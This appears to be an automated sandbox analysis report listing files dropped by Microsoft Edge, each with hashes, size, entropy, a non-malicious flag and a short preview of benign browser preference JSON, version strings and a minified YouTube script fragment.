                                                                                                                                                                                  SHA1:D1CA8D64C063C290D7C6BE8D75B46140BA38DAA0
                                                                                                                                                                                  SHA-256:1C3A4E3879CBCFBE724F5A7857C65F6066B72DD55BCC325168C97E2C981E9E6D
                                                                                                                                                                                  SHA-512:80F75F92378362B9A7F7EC4552E07A82ADC0C13C2DADE37328DEFDE0882E863BB7BB9697FEA4211FC879275049647228AE32F1B788D91BFB79D9B97C6D896BEA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10792
                                                                                                                                                                                  Entropy (8bit):5.154343594301974
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kXD3+M8pVb2/bV+FqbtwOyL1y2UIs0sD74JxUHhPcYJ:st+SIKCs/13CDNSHVb2/bGqxwPLQ2UVj
                                                                                                                                                                                  MD5:1D7F659639A07A11E8298A5A296D25EF
                                                                                                                                                                                  SHA1:DD3C9D678CCFA3FB2F9CAC708FCAC2F06E6CDD0B
                                                                                                                                                                                  SHA-256:3F685CDC415AC2E98362A4C2118034F5D8C384CF52C8008AED812933499A20C8
                                                                                                                                                                                  SHA-512:118575A4BA12F42B62443E42F8852ECCBED4956FDCC77DDE56B6F3F6ABCFDEC5EB98703D9FDEB9C2FF65B94EACC94904FD92518ED992E6F0C4D6012D9F183C44
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                  MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                  SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                  SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                  SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (2222)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3403059
                                                                                                                                                                                  Entropy (8bit):5.587037002028163
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:3FITo4nCn1uL0TRzNkEmFKVHL/2rcS0UmM/nDecu+0ZXKi0ghRVHXciaYkp:+Tob9LU
                                                                                                                                                                                  MD5:D66F15D779A59C62DDA84FB4A4E99DC8
                                                                                                                                                                                  SHA1:E439C396962F5B0C456AD7A9D8C5E262346260B3
                                                                                                                                                                                  SHA-256:C3C4248A6B7877F2288E9C726D7CDE3BA4A0864D83945D3EE886156A3D0B5C7A
                                                                                                                                                                                  SHA-512:1AA270DBD8D293CECDB6493878DCBAB9A7F0076A2DAA774E4E3D60BE0DF19CCB6B94DDE23FB20B5086EE45F8638EAC9962C40B987A65BA21EFE0BEFE5780A067
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;c.call(b,d.content.cloneNode(!0),a.content.firstChild);return asc=a},{mode:HD()?0:1});var csc;var dsc;var esc=ca(["background-color:",";"]),fsc=function(){return M.apply(this,arguments)||this};.n(fsc,M);fsc.prototype.computeThumbnailStyle=function(a){if(a&&(a=kC(a)))return Ph(esc,a)};.var gsc=fsc;u([N(X.YtRendererBehavior),w("design:type",Object)],gsc.prototype,"rendererBehaviors",void 0);u([P(),w("design:type",Object)],gsc.prototype,"data",void 0);gsc=u([Q({disableElementRegistration:!0,is:"ytd-hashtag-tile-renderer"})],gsc);.V(gsc,"ytd-hashtag-tile-renderer",function(){if(void 0!==dsc)return dsc;var a=document.createElement("template");L(a," css-build:shady--> css-build:shady--><div id=\"content-section\" class=\"style-scope ytd-hashtag-tile-renderer\"><div id=\"thumbnail-section\" class=\"style-scope ytd-hashtag-tile-renderer\"><a class=\"hashtag-link yt-simple-endpoint style-scope ytd-hashtag-tile-renderer\" href$=\"[[computeHref_(data.onTapCommand)]]\" data=\"[[data.onTapCo
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13968
                                                                                                                                                                                  Entropy (8bit):5.240530992022521
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGKSuQKCs/13CDaSLlHVb2/bGqxwPLQ2UV0sDpNkYJSHj:sDOxu33CXebG5sNAD
                                                                                                                                                                                  MD5:2BCD1B08684A0C70CCFCF461D6BD9E38
                                                                                                                                                                                  SHA1:FB3F3337ACADA6D799033015F21D7DF168A4138B
                                                                                                                                                                                  SHA-256:A85E8E1F6F67376B94C1265B6C2C1B27E9E0E5BEE8422DA9AEA2D593153B3027
                                                                                                                                                                                  SHA-512:68AF09645A4EA86ABF938F38B373051C3FCD0E87FFCE5E9F5CB810D9D6039DB3B760442413235AD2699BDAB46F2A13B86EAF6AC7001A90678579CDCC6346E217
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10556
                                                                                                                                                                                  Entropy (8bit):5.143461600078083
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8pCr+bV+FqoVQWWrrvwUIDiJJxUHhPcYJ:st+SIKCs/13CDGSHCr+bGq2Q/rbwU2iK
                                                                                                                                                                                  MD5:C5FBFA7DD3FBCB17014E3314E294A606
                                                                                                                                                                                  SHA1:A0CFC710E14EE5349438974902527497C6FD7786
                                                                                                                                                                                  SHA-256:1B4415D6B29F99E3A9CB94EA8DD2F59BCECF2358929136ED89C5120FF2C58C06
                                                                                                                                                                                  SHA-512:373BE7A156ABEE346D7888148DE8F0B077A7E595E8E84F352AE32FFF37DD9CF1AE34933CF640C53EFE6205B0538A3FA2360B3D97DD9238C0339C447076DB3105
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14093
                                                                                                                                                                                  Entropy (8bit):5.238858716547755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGouSuQKCsF13CDaSLlHVb2VbGqxwPLm2UV0sDxNkYJSHj:sDOoVu13CXYbG3YNAD
                                                                                                                                                                                  MD5:E31BF74E9D1E24DB549B4B2AAF3B6093
                                                                                                                                                                                  SHA1:BF31992AF1C84AAB0B5D021AC0969E71F4A88BDD
                                                                                                                                                                                  SHA-256:CE10670C1E9DC27D7789CE9CDC16EBF4F6A2BC77B1A33FD68F2C7DF2B941B884
                                                                                                                                                                                  SHA-512:EECDDDC37B7F77E0139BCBCDB5E196AFEA8D2C9644161DC8A1B31DC39B8C9931E5D2C904A1F16587AE8D9B7B338619EE919E7EA581E1256025B2503E73EA17A3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11140
                                                                                                                                                                                  Entropy (8bit):5.17155437458015
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kwD3+M8RLpHVb2/bV+FqbtwOyL1y2UIs0sD74JxUHhPc8:st+SIKCs/13CDaSLlHVb2/bGqxwPLQ28
                                                                                                                                                                                  MD5:EAD07B1C9B305D5C351839F79CE19494
                                                                                                                                                                                  SHA1:0260C43219F4F1F36C90562A672C5CE2B3FE13C4
                                                                                                                                                                                  SHA-256:68F2B198D7AF0F8A1D4EDFA20DB756FF294E36862E5BFFAF8DC3C704EE802020
                                                                                                                                                                                  SHA-512:30A3BF15B21D423563039DE0B955EEE2D9412FCFCCD452BE9A68CEF292395FE1F7237EBDD7959344FE3BD8C8B517CA25690B226CA836FD6927AD9EE15991E37A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25186
                                                                                                                                                                                  Entropy (8bit):5.570608638730163
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjW2iW5w02f44i8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPaSIH0+OrwXtG5Wpw:VvmjjiWa02fniu1jalf/Ld+t/
                                                                                                                                                                                  MD5:DDB59C35000F95B6DC52BC66EB97858D
                                                                                                                                                                                  SHA1:5CBD2C3ABF5497B871BDC5E1305EEEE3442FCB1B
                                                                                                                                                                                  SHA-256:9248D7E6BD990EB13F3CF3A0C0C59276D51B840D163D600EAFB88C5700E08393
                                                                                                                                                                                  SHA-512:D2C24A61D7C9142EAA59F90CB11008EA961FC7CA983A6043D25A858901363641B90A710E898DC5415E5D9DC64FE29D72E409BE6436BE06B7CEA31F2287BC749E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13993
                                                                                                                                                                                  Entropy (8bit):5.240014160950588
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGQSuQKCs/13CDaSLlHVb2/bGqxwPLQ2UV0sDpNkYJSHj:sDOXu33CXebG5sNAD
                                                                                                                                                                                  MD5:D06FC57D4252DE8FD00C2DECCA6F5FB6
                                                                                                                                                                                  SHA1:AA0C6913EB2E644DC84D29028FB6B086CFFC8536
                                                                                                                                                                                  SHA-256:806EC6788C491ADAADA2D82B15969BF2B55FD0C7647DFDFD4182AB4B7BA09820
                                                                                                                                                                                  SHA-512:687BE1B4140047631D68DB698EC71E5985873906256F9C1DE93BA1CBAD0508923520955D7536B89709254F39C877D5DC3030B72FED7ECE5E52D1A3C01358C580
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.6612262562697895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                  MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                  SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                  SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                  SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:117.0.2045.55
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                  Entropy (8bit):6.089812546757156
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWVdi1zNtPMNkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDWkzItSmd6qE7lFoC
                                                                                                                                                                                  MD5:F4DA5AF7581C5B635DB57D524AF47AA1
                                                                                                                                                                                  SHA1:4AABA36D8D5CEBBFBBEA520795F77345198B27C0
                                                                                                                                                                                  SHA-256:BEDD9A435C9B7C41FBCF600962B47A5792484FF567ADF97DEA1489BC3F6EA0D1
                                                                                                                                                                                  SHA-512:F680E442771491E4C43D8CB0F3A8E732DC5B706A98B3AD9724801D2CA8DF9520CCCA73622B3F10A8B2360650FF8AD7B19204C9D6F9A18386C683DED79847D43A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                  Entropy (8bit):3.9904355005135823
                                                                                                                                                                                  Encrypted:false
